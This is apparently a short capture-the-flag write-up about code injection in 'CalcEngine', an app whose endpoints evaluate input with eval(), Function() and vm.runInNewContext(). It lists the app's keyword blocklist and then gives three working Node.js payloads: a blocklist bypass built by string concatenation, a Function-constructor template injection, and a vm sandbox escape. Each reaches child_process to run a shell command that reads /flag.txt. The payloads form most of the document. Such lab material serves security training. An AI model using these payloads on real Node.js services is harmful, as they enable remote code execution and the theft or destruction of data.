Code Injection

CalcEngine provides three endpoints that evaluate user input with eval(), Function(), and vm.runInNewContext(). All three can be exploited for remote code execution (RCE). The flag is at /flag.txt.

Calculator (eval)

Blocked: require, process, child_process, exec, spawn, fs

Template (Function)

Sandbox (vm)

Bypass Techniques

# eval bypass (avoid blocked words):
this.constructor.constructor('return this')().constructor.constructor('return this')()['pro'+'cess']['mainM'+'odule']['req'+'uire']('child_'+'process')['ex'+'ecSync']('cat /flag.txt').toString()

# Function constructor:
${this.constructor.constructor('return global.process.mainModule.require("child_process").execSync("cat /flag.txt").toString()')()}

# VM escape:
this.constructor.constructor('return this')().process.mainModule.require('child_process').execSync('cat /flag.txt').toString()
